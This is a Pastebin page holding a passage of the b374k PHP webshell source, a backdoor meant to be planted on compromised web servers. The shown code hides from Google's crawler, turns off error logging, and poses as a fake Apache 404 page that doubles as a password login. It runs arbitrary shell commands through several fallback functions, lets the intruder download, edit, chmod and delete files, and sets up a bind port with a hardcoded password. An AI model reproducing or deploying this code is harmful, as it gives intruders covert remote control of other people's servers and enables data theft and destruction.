Altenator_IWnet

PHP b374k Newbie3vilc063s - New

Feb 5th, 2013
313
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 155.93 KB | None | 0 0
  1. <?php
  2.  
  3. /*********************************************************************************************************/
  4. $auth_pass = ""; //password crypted with md5, place it if you want your webshell have password..
  5. $cookie_hour_expire = 24;
  6. /*********************************************************************************************************/
  7. $color = "#00ff00";
  8. $default_action = 'FilesMan';
  9. @define('SELF_PATH', __FILE__);
  10.  
  11. /*********************************************************************************************************/
  12. # Avoid google's crawler
  13. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit; }
  14. /*********************************************************************************************************/
  15.  
  16. @session_start();
  17. @error_reporting(0);
  18. @ini_set('error_log',NULL);
  19. @ini_set('log_errors',0);
  20. @ini_set('max_execution_time',0);
  21. @set_time_limit(0);
  22. @set_magic_quotes_runtime(0);
  23. @define('VERSION', 'v.2012');
  24. @define('TITLE', ':: b374k Newbie3viLc063s 2012 ::');
  25.  
  26. /*********************************************************************************************************/
  27.  
  28. if( get_magic_quotes_gpc() )
  29. {
  30.     function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); }
  31.     $_POST = stripslashes_array($_POST);
  32. }
  33.  
  34. if(isset($_POST['logout'])){
  35.     setcookie("b374kNEC2012", "", time()-(60*(60*60*360000)));
  36.     $page = $host='http://'.$_SERVER['SERVER_NAME'].'/'.$_SERVER['PHP_SELF'];
  37.         echo '<center><span class="b1">The System Is Going To Down For LogOut Administrator Pages!!</scan></center>';
  38.     ?>
  39.     <script>window.location.href = '<?php print $page; ?>';</script>
  40.     <?php
  41.     exit(0);
  42. }
  43.  
  44. function myshellexec($command) {
  45. if (!($p=popen("($command)2>&1","r"))) {
  46. return 126;
  47. }
  48. while (!feof($p)) {
  49. $line=fgets($p,1000);
  50. $out .= $line;
  51. }
  52. pclose($p);
  53. return $out;
  54. }
  55.  
  56. function delete_option($file){
  57.     if(!$win){
  58.         @exe("rm -rf ".$file);
  59.         if(file_exists($file) && is_file($file)){
  60.             unlink($file);
  61.         }elseif(file_exists($file) && is_dir($file)){
  62.             rmdir($file);
  63.         }
  64.     }elseif($win){
  65.         if(is_dir($file)){
  66.             @exe("rd /s /q ".$file);
  67.             if(file_exists($file)){
  68.                 rmdir($file);
  69.             }
  70.         }else{
  71.             @exe("del /q /f ".$file);
  72.             exe("rd /s /q ".$file);
  73.             if(file_exists($file)){
  74.                 unlink($file);
  75.             }
  76.         }
  77.     }
  78. }
  79.  
  80. function php_name(){
  81.     $currentFile = $_SERVER["PHP_SELF"];
  82.     $parts = Explode('/', $currentFile);
  83.     return $parts[count($parts) - 1];
  84. }
  85.  
  86. function parsesort($sort)
  87. {
  88.  $one = intval($sort);
  89.  $second = substr($sort,-1);
  90.  if ($second != "d") {$second = "a";}
  91.  return array($one,$second);
  92. }
  93.  
  94. function image_ext($filename){
  95.   $image = array("gif", "ico", "jpeg", "jpg", "png", "svg");
  96.   foreach ($image as $images){
  97.     if(end(explode('.', $filename)) == "$images"){
  98.       return TRUE;
  99.     }
  100.   }
  101. }
  102.  
  103. $disablefunc = @ini_get("disable_functions");
  104.  
  105. function showdisablefunctions() {
  106.     if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:#00FF1E'>".$disablefunc."</span>"; }
  107.     else { return "<span style='color:#00FF1E'>NONE</span>"; }
  108.   }
  109.  
  110.   function ex($cfe) {
  111. $res = '';
  112. if (!empty($cfe)) {
  113. if(function_exists('exec')) {
  114. @exec($cfe,$res);
  115. $res = join("\n",$res);
  116. } elseif(function_exists('shell_exec')) {
  117. $res = @shell_exec($cfe);
  118. } elseif(function_exists('system')) {
  119. @ob_start();
  120. @system($cfe);
  121. $res = @ob_get_contents();
  122. @ob_end_clean();
  123. } elseif(function_exists('passthru')) {
  124. @ob_start();
  125. @passthru($cfe);
  126. $res = @ob_get_contents();
  127. @ob_end_clean();
  128. } elseif(@is_resource($f = @popen($cfe,"r"))) {
  129. $res = "";
  130. while(!@feof($f)) { $res .= @fread($f,1024); }
  131. @pclose($f);
  132. } else { $res = "Ex() Disabled!"; }
  133. }
  134. return $res;
  135. }
  136.  
  137.  
  138. function showstat($stat) {
  139. if ($stat=="on") { return "<b><font style='color:#00FF00'>ON</font></b>"; }
  140. else { return "<b><font style='color:#DD4736'>OFF</font></b>"; }
  141. }
  142. function testperl() {
  143. if (ex('perl -h')) { return showstat("on"); }
  144. else { return showstat("off"); }
  145. }
  146. function testfetch() {
  147. if(ex('fetch --help')) { return showstat("on"); }
  148. else { return showstat("off"); }
  149. }
  150. function testwget() {
  151. if (ex('wget --help')) { return showstat("on"); }
  152. else { return showstat("off"); }
  153. }
  154. function testoracle() {
  155. if (function_exists('ocilogon')) { return showstat("on"); }
  156. else { return showstat("off"); }
  157. }
  158. function testpostgresql() {
  159. if (function_exists('pg_connect')) { return showstat("on"); }
  160. else { return showstat("off"); }
  161. }
  162. function testmssql() {
  163. if (function_exists('mssql_connect')) { return showstat("on"); }
  164. else { return showstat("off"); }
  165. }
  166. function testcurl() {
  167. if (function_exists('curl_version')) { return showstat("on"); }
  168. else { return showstat("off"); }
  169. }
  170. function testmysql() {
  171.     if (function_exists('mysql_connect')) { return showstat("on");
  172. }else{
  173.     return showstat("off"); }
  174. }
  175.  
  176. $quotes = get_magic_quotes_gpc();
  177. if ($quotes == "1" or $quotes == "on"){
  178.     $quot = "<font style='color:red'>ON</font>";
  179. }else{
  180.     $quot = "<font style='color:green'>OFF</font>";
  181. }
  182.  
  183.  
  184. function printLogin()
  185. {
  186.     ?>
  187. <html>
  188.     <head>
  189.         <title>404 Not Found</title>
  190.     </head>
  191.     <style> input { margin:0;background-color:#fff;border:1px solid #fff; } </style>
  192.     <body>
  193.         <h1>Not Found</h1>
  194.         <p>The requested URL <? $_SERVER['PHP_SELF'] ?> was not found on this server.</p>
  195.         <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
  196.         <hr>
  197.         <form method=post>
  198.             <address>Apache/2.2.8 at <?=$_SERVER['HTTP_HOST']?> Port 80<center><input type=password name=x><input type=submit value=''></center></address>
  199.         </form>
  200.     </body>
  201. </html>
  202.     <?php
  203.     exit;
  204. }
  205.  
  206. // New Login System :)
  207. $cookie_value = md5($_SERVER['HTTP_HOST']."b374kNEC2012".$auth_pass);
  208.  
  209. if(isset($_POST['x'])){
  210.     if(md5($_POST['x']) != $auth_pass){
  211.         printLogin();
  212.     }else{
  213.         setcookie("b374kNEC2012", $cookie_value, time()+(60*(60*$cookie_hour_expire)));
  214.     }
  215. }elseif(isset($_COOKIE['b374kNEC2012'])){
  216.     if($_COOKIE['b374kNEC2012'] != $cookie_value){
  217.         printLogin();
  218.     }
  219. }elseif(!isset($_COOKIE['b374kNEC2012'])){
  220.     printLogin();
  221. }
  222. //
  223.  
  224. if(isset($_GET['dl']) && ($_GET['dl'] != ""))
  225.     {
  226.     $file   = $_GET['dl'];
  227.     $filez  = @file_get_contents($file);
  228.     header("Content-type: application/octet-stream");
  229.     header("Content-length: ".strlen($filez));
  230.     header("Content-disposition: attachment;
  231.     filename=\"".basename($file)."\";");
  232.     echo $filez;
  233.     exit;
  234.     }
  235.  
  236. elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != ""))
  237.     {
  238.     $file = $_GET['dlgzip'];
  239.     $filez = gzencode(@file_get_contents($file));
  240.     header("Content-Type:application/x-gzip\n");
  241.     header("Content-length: ".strlen($filez));
  242.     header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
  243.     echo $filez; exit;
  244.     }
  245.  
  246. if(isset($_GET['img']))
  247.     {
  248.     @ob_clean();
  249.     $d = magicboom($_GET['y']);
  250.     $f = $_GET['img'];
  251.     $inf = @getimagesize($d.$f);
  252.     $ext = explode($f,".");
  253.     $ext = $ext[count($ext)-1];
  254.     @header("Content-type: ".$inf["mime"]);
  255.     @header("Cache-control: public");
  256.     @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  257.     @header("Cache-control: max-age=".(60*60*24*7));
  258.     @readfile($d.$f);
  259.     exit;
  260.     }
  261. $ver = VERSION;
  262.  
  263. $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
  264.  
  265. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE;
  266. else $safemode  = FALSE;
  267. $system     = @php_uname();
  268.  
  269. if(strtolower(substr($system,0,3)) == "win") {
  270.     $win = TRUE;
  271.     } else {
  272.     $win    = FALSE;
  273. }
  274.  
  275. if(isset($_GET['y']))
  276.     { if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } }
  277.  
  278. if(!$win)
  279.     { if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; }
  280. else
  281.     {
  282.     $user   = @get_current_user();
  283.     $id     = $user;
  284.     $prompt = $user." &gt;";
  285.     $pwd    = realpath(".")."\\";
  286.     $v  = explode("\\",$d);
  287.     $v  = $v[0];
  288.     foreach (range("A","Z") as $letter)
  289.         {
  290.         $bool = @is_dir($letter.":\\");
  291.         if ($bool)
  292.             {
  293.             $letters    .= "<a href=\"?y=".$letter.":\\\">[ ";
  294.             if ($letter.":" != $v) {$letters .= $letter;}
  295.             else {$letters  .= "<span class=\"gaya\">".$letter."</span>";}
  296.             $letters    .= " ]</a> ";
  297.             }
  298.         }
  299.     }
  300.  
  301. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  302. else $posix = FALSE;
  303.  
  304.  
  305.         $bytes = disk_free_space(".");
  306.         $si_prefix = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
  307.         $base = 1024;
  308.         $class = min((int)log($bytes , $base) , count($si_prefix) - 1);
  309.         $totalspace_bytes = disk_total_space(".");
  310.         $totalspace_si_prefixs = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
  311.         $totalspace_bases = 1024;
  312.         $totalspace_class = min((int)log($totalspace_bytes , $totalspace_bases) , count($totalspace_si_prefixs) - 1);
  313.         $totalspace_show = sprintf('%1.2f' , $totalspace_bytes / pow($totalspace_bases,$totalspace_class)) . ' ' . $totalspace_si_prefixs[$totalspace_class] . '';
  314.         $freespace_show = sprintf('%1.2f' , $bytes / pow($base,$class)) . ' ' . $si_prefix[$class] . '';
  315.     $server_ip  = @gethostbyname($_SERVER["HTTP_HOST"]);
  316.     $my_ip      = $_SERVER['REMOTE_ADDR'];
  317.     $bindport   = "55555";
  318.     $bindport_pass  = "Newbie3viLc063s";
  319.     $pwds       = explode(DIRECTORY_SEPARATOR,$pwd);
  320.     $pwdurl     = "";
  321.     for($i = 0 ; $i < sizeof($pwds)-1 ; $i++)
  322.         {
  323.         $pathz  = "";
  324.         for($j  = 0 ; $j <= $i ; $j++)
  325.             {
  326.             $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
  327.             }
  328.         $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
  329.         }
  330.  
  331.     if(isset($_POST['rename'])){
  332.         $old = $_POST['oldname'];
  333.         $new = $_POST['newname'];
  334.         @rename($pwd.$old,$pwd.$new);
  335.         $file = $pwd.$new;
  336.         }
  337.     if(isset($_POST['chmod'])){
  338.         $name = $_POST['name'];
  339.         $value = $_POST['newvalue'];
  340.         if (strlen($value)==3){
  341.         $value = 0 . "" . $value;
  342.         }
  343.         @chmod($pwd.$name,octdec($value));
  344.         $file = $pwd.$name;
  345.         }
  346.     if(isset($_POST['chmod_folder'])){
  347.         $name = $_POST['name'];
  348.         $value = $_POST['newvalue'];
  349.         if (strlen($value)==3){
  350.         $value = 0 . "" . $value;
  351.         }
  352.         @chmod($pwd.$name,octdec($value));
  353.         $file = $pwd.$name;
  354.         }
  355.     $buff = $DISP_SERVER_SOFTWARE."<br />";
  356.     $buff .= '<font style="color:#F58F78">'.$system.'</font><br />';
  357.     if($id != "") $buff .= $id."<br />";
  358.     $buff .= "Server IP : "."<span style='color:#FF8800'>$server_ip</span>"."<font> | </font>"."Your IP : "."<span style='color:#FF0000'>$my_ip</span>"."<br />";
  359.         $buff .= "Total HDD Space : "."<span style='color:#00FF1E'>$totalspace_show</span>"."<font> | </font>"."Free HDD Space : "."<span style='color:#00FF1E'>$freespace_show</span>"."<br />";
  360.         $buff .=  "Magic Quotes:$quot"."<br>";
  361.         $buff .= "Disabled Functions: ".showdisablefunctions()."<br>";
  362.         $buff .= "MySQL: ".testmysql()." MSSQL: ".testmssql()." Oracle: ".testoracle()." MSSQL: ".testmssql()." PostgreSQL: ".testpostgresql()." cURL: ".testcurl()." WGet: ".testwget()." Fetch: ".testfetch()." Perl: ".testperl()."<br>";
  363.     if($safemode) $buff .= "safemode <span class=\"gaya\">ON</span><br />";
  364.     else $buff .= "safemode <span class=\"gaya\">OFF<span><br />";
  365.     $buff .= $letters."&nbsp;&gt;&nbsp;".$pwdurl;
  366.  
  367.     function rapih($text){ return trim(str_replace("<br />","",$text)); }
  368.  
  369.     function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); }
  370.  
  371.     function showdir($pwd,$prompt)
  372.     {
  373.         $fname = array();
  374.         $dname = array();
  375.         if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  376.         else $posix = FALSE;
  377.         $user = "????:????";
  378.         if($dh = opendir($pwd))
  379.             {
  380.             while($file = readdir($dh))
  381.                 {
  382.                 if(is_dir($file))
  383.                     { $dname[] = $file; }
  384.                 elseif(is_file($file))
  385.                     { $fname[] = $file; }
  386.                 }
  387.             closedir($dh);
  388.             }
  389.         sort($fname);
  390.         sort($dname);
  391.         $path = @explode(DIRECTORY_SEPARATOR,$pwd);
  392.         $tree = @sizeof($path);
  393.         $parent = "";
  394.         $buff = "<form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
  395.                 <table class=\"cmdbox\" style=\"width:50%;\">
  396.                 <tr>
  397.                 <td>CMD@$prompt</td>
  398.                 <td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" />
  399.                 <input class=\"inputzbut\" type=\"submit\" value=\"Execute !\" name=\"submitcmd\" style=\"width:80px;\" /></td>
  400.                 </tr>
  401.             </form>
  402.             <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
  403.                 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  404.                 <tr>
  405.                 <td>view file/folder</td>
  406.                 <td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" />
  407.                 <input class=\"inputzbut\" type=\"submit\" value=\"Enter !\" name=\"submitcmd\" style=\"width:80px;\" /></td>
  408.                 </tr>
  409.             </form>
  410.             </table>
  411.             <table class=\"explore\">
  412.                 <tr>
  413.                 <th>name</th>
  414.                 <th style=\"width:80px;\">size</th>
  415.                 <th style=\"width:210px;\">owner:group</th>
  416.                 <th style=\"width:80px;\">perms</th>
  417.                 <th style=\"width:110px;\">modified</th>
  418.                 <th style=\"width:190px;\">actions</th>
  419.                 </tr> ";
  420.  
  421.         if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
  422.         else $parent = $pwd;
  423.         foreach($dname as $folder)
  424.             {
  425.             if($folder == ".")
  426.                 {
  427.                 if(!$win && $posix)
  428.                     {
  429.                     $name=@posix_getpwuid(@fileowner($folder));
  430.                     $group=@posix_getgrgid(@filegroup($folder));
  431.                     $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  432.                     }
  433.                 else { $owner = $user; }
  434.                 $buff .= "<tr>
  435.                         <td><a href=\"?y=".$pwd."\">$folder</a></td>
  436.                         <td>-</td>
  437.                         <td style=\"text-align:center;\">".$owner."</td>
  438.                         <td><center>".get_perms($pwd)."</center></td>
  439.                         <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td>
  440.                         <td><span id=\"titik1\">
  441.                             <a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a>
  442.                             | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a>
  443.                             </span>
  444.                         <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  445.                             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  446.                             <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  447.                             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  448.                         </form>
  449.                         </td>
  450.                     </tr> ";
  451.                 }
  452.             elseif($folder == "..")
  453.                 {
  454.                 if(!$win && $posix)
  455.                     {
  456.                     $name=@posix_getpwuid(@fileowner($folder));
  457.                     $group=@posix_getgrgid(@filegroup($folder));
  458.                     $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  459.                     }
  460.                 else    { $owner = $user; }
  461.                 $buff .= "<tr>
  462.                         <td>
  463.                         <a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAadEVYdFNvZnR3YXJlAFBhaW50Lk5FVCB2My41LjEwMPRyoQAAAgZJREFUOE9jYKAF4I7ez6CVfVQvpOOiGcnm8yUdYVRvuWalvvjNTemqi01cUfuJN4Mv/QSjRsdNG81VH6/Lb/vzT6juWhtP/CFGokwQyD3DqNpxy1Zj5YdrCjv+/Zfb+uefSNPNNt6044QNECy5wKjUesNadcHr63Jrv/2XAWL5NV//W819sk9/6sMcMJ4GwXpTHiboTLpvpzXhnoxx/x0WBsHKywzyjdfNlKY9uSU1781/SSQsMef1f4nZr1DxrJcvJWe+XC45/XmIQv8DfgbBqqvScl1374r1Pfwv2gvDD4BsGIaIgeTF+h/9F5vw+I3YxMfrxCY+iQLyBRlEaq+JSjTdWCfRfPOPUMON/zAsDGSLNt38L4aGRZtvvhFrvrVOtOV2FBALMgjVXGMUb7qpIdNxZ51U193fIu13/4OwKBDrdj74bDbzwRNkbDrj/mXj6fdnGk6976/Xd58fHEPA0GaS7LirLdf3YI10/8NfolDviLU8WAQ01E66664tHHffNZftuasq33NPWLXjPgs8ikU77jFL9T3UkZ38ZI3U1Ge/xKc8+wf0Z5tI5z1GoIvQMQNQjEG07S5qEhHve8QsNfmpjvSM52ukZ736JT7pRRvQIMLpANkYoAZm6ZkvtDVmvVktWPK6SmL6K9IMABkmM/slk+qMN7Iy/W/kxKe/ISolk60IAJfcKhfb3kZPAAAAAElFTkSuQmCC' />  $folder</a></td>
  464.                         <td>-</td>
  465.                         <td style=\"text-align:center;\">".$owner."</td>
  466.                         <td><center>".get_perms($parent)."</center></td>
  467.                         <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
  468.                         <td><span id=\"titik2\">
  469.                             <a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a>
  470.                             | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a>
  471.                             </span>
  472.                         <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  473.                             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  474.                             <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  475.                             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  476.                         </form>
  477.                         </td>
  478.                     </tr>";
  479.                 }
  480.             else
  481.                 {
  482.                 if(!$win && $posix)
  483.                     {
  484.                     $name=@posix_getpwuid(@fileowner($folder));
  485.                     $group=@posix_getgrgid(@filegroup($folder));
  486.                     $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  487.                     }
  488.                 else { $owner = $user; }
  489.                 $buff .= "<tr>
  490.                         <td>
  491.                         <a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAALGPC/xhBQAAAAlwSFlzAAAOwgAADsIBFShKgAAAABp0RVh0U29mdHdhcmUAUGFpbnQuTkVUIHYzLjUuMTAw9HKhAAACkUlEQVQ4T8WT2UvUURzFz2NRT5pab9ZDYZNMLjNq6rg1Fqhl5cw8qA+2kJmBgxKUhVpW4y6FZblkaRROpkQLITKG1ERhC5JMuaVmzuQWBD3e27nN0D/QQz/48P1+7znne+/LD/jvn14XtUYXqU+O0kebY2NiLfFxBkuiIcmSnJRiMe5MtexK3W02phjNSYnJZkN8gikmeoeJGRMzRr1OvxZbQzTBZCBUE+oJD4vwcJEnNibOY4hL8HCRJzEh6U/PMzc1d/j2CPc2TaibmSFNiGYT7hT7nbyU579y4dA6WXUsQNacCJR1RYGyoThINpZs8LFe1luD/mi2/ABZedBf2vL8fnSV+JdhohZPJ+sgv16H9NyGXOyGXH4AudLLetfLSh8rZ6Upj/JOMTNRAwfGa9A3Wetb0OlbQPPSffZdXpbZ/11Aj1qgMuPVeIYxG7rGbZAzTZDzHZDfeeOindxjf5M3tkMuMLTEswVqyjNzleEqSGZ74KrEZVcFn1QPMcfN7g4IPlPMN0N8a/IyR9xthJryTDVAuM5Bus6jBaPlKB85xW0XIaYb+bxrkLNXIL5UQxJVxRRfOM0LZnmz8iivyoyWwYaRUhS8LYL4WArxuRJiooq1AuLTGR9nOZd5z5Q2Ro/yqszIaVgxbEXmy8OQbwoh3pdAvrNCvD4KMXwccriAVVFIPR/iQzGhR3lfMMOsCY4chPVb8JPIwVzI5zmQA2aI/izO7AezOVNzZEMM5VGnR3nJL0cuInErHcH2DHTb0+DszcSrh1lwPjb7sMD5hKj5kQlOpfXRY0+HszsDPZ0Z2IjcMKyuTsXm5jRob+yBtnUftG0HSBa07QqTt7bu92ote6FtToeWmS1HdFj1zz/zb9ZqmlZ866Y6AAAAAElFTkSuQmCC' />  [ $folder ]</a>
  492.                         <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  493.                             <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  494.                             <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
  495.                             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  496.                             <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  497.                             onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
  498.                         </form>
  499.                         </td>
  500.                         <td>DIR</td>
  501.                         <td style=\"text-align:center;\">".$owner."</td>
  502.                         <td><center>
  503.                         <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
  504.                             <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  505.                             <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  506.                             <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
  507.                             <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
  508.                             <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  509.                             onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />
  510.                     </form>
  511.                     </center></td>
  512.                         <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td>
  513.                         <td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a>
  514.                         | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a>
  515.                         </td>
  516.                         </tr>";
  517.                 }
  518.             }
  519.         foreach($fname as $file)
  520.             {
  521.             $full = $pwd.$file;
  522.             if(!$win && $posix)
  523.                 {  
  524.                 $name=@posix_getpwuid(@fileowner($file));
  525.                 $group=@posix_getgrgid(@filegroup($file));
  526.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  527.                 }
  528.             else { $owner = $user; }
  529.             $buff .= "<tr>
  530.                     <td>
  531.                     <a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAadEVYdFNvZnR3YXJlAFBhaW50Lk5FVCB2My41LjEwMPRyoQAAAXVJREFUOE+NkjtPwlAYhv0DLEZJSDQawQCTcYD/YWIkzqx0cHT1D7C4nMRFSdOWi4uzm9FFXcRBI3KxQGlLoYCAILyekhiRw6UneZKmeb8n79eepaW/43e5XFGfz0csvF4v8Xi2yfrGJllecRIa2xnLMo+OcDis6kYNulEfUdEMZD/KuH1IQ7y6RiQS0eZJAolkig6U/pHJy0i/vOPm/gnlikYl3ExJMJm6hFxWGQpFhUqyKJQqyNFGHMfptMnu5A5UkBrVZqkiLyt4zcrI5It4y8nY2w9ZkrVxSdBaoVozZ6LqtVGDu8dnHB2fgA4HGYHZaGE2TRj1BoqKhlNyxgriiSRan+2FmM0WYrzACiQq6HS7C2l3uhDjiSkC+vKr17OFNE0gSnH0+9+2sLLMRxRECYPBwBaCOEXACyKGw6EteEFiGgTOYzzsnguapSsExu+B4yB0qJYUlf5rcy5WxsrSYcfkdfavOp3RLbebzMPK0EH/7/APv59j7X+gJNIAAAAASUVORK5CYII%3D' />  $file</a>
  532.                     <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  533.                         <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  534.                         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
  535.                         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  536.                         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  537.                             onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
  538.                     </form>
  539.                     </td>
  540.                     <td>".ukuran($full)."</td>
  541.                     <td style=\"text-align:center;\">".$owner."</td>
  542.                     <td><center>
  543.                     <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
  544.                     <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  545.                         <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  546.                         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
  547.                         <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
  548.                         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  549.                             onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" />
  550.                     </form></center></td>
  551.                     <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
  552.                     <td>
  553.                     <a href=\"?y=$pwd&amp;edit=$full\">edit</a>
  554.                     | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a>
  555.                     | <a href=\"?y=$pwd&amp;delete=$full\">delete</a>
  556.                     | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gz</a>)
  557.                     </td>
  558.                 </tr>";
  559.             }
  560.         $buff .= "</table>"; return $buff;
  561.     }
  562.  
  563.     function ukuran($file)
  564.     {
  565.         if($size = @filesize($file))
  566.             {  
  567.             if($size <= 1024) return $size;
  568.             else
  569.                 {
  570.                 if($size <= 1024*1024)
  571.                     { $size = @round($size / 1024,2);; return "$size kb"; }
  572.                 else { $size = @round($size / 1024 / 1024,2); return "$size mb"; }
  573.                 }
  574.             }
  575.         else return "???";
  576.     }
  577.  
  578.     function exe($cmd)
  579.     {
  580.         if(function_exists('system'))
  581.             {
  582.             @ob_start();
  583.             @system($cmd);
  584.             $buff = @ob_get_contents();
  585.             @ob_end_clean();
  586.             return $buff;
  587.             }
  588.         elseif(function_exists('exec'))
  589.             {
  590.             @exec($cmd,$results);
  591.             $buff = "";
  592.             foreach($results as $result)
  593.                 { $buff .= $result; }
  594.             return $buff;
  595.             }
  596.         elseif(function_exists('passthru'))
  597.             {
  598.             @ob_start();
  599.             @passthru($cmd);
  600.             $buff = @ob_get_contents();
  601.             @ob_end_clean();
  602.             return $buff;
  603.             }
  604.         elseif(function_exists('shell_exec'))
  605.             {
  606.             $buff = @shell_exec($cmd);
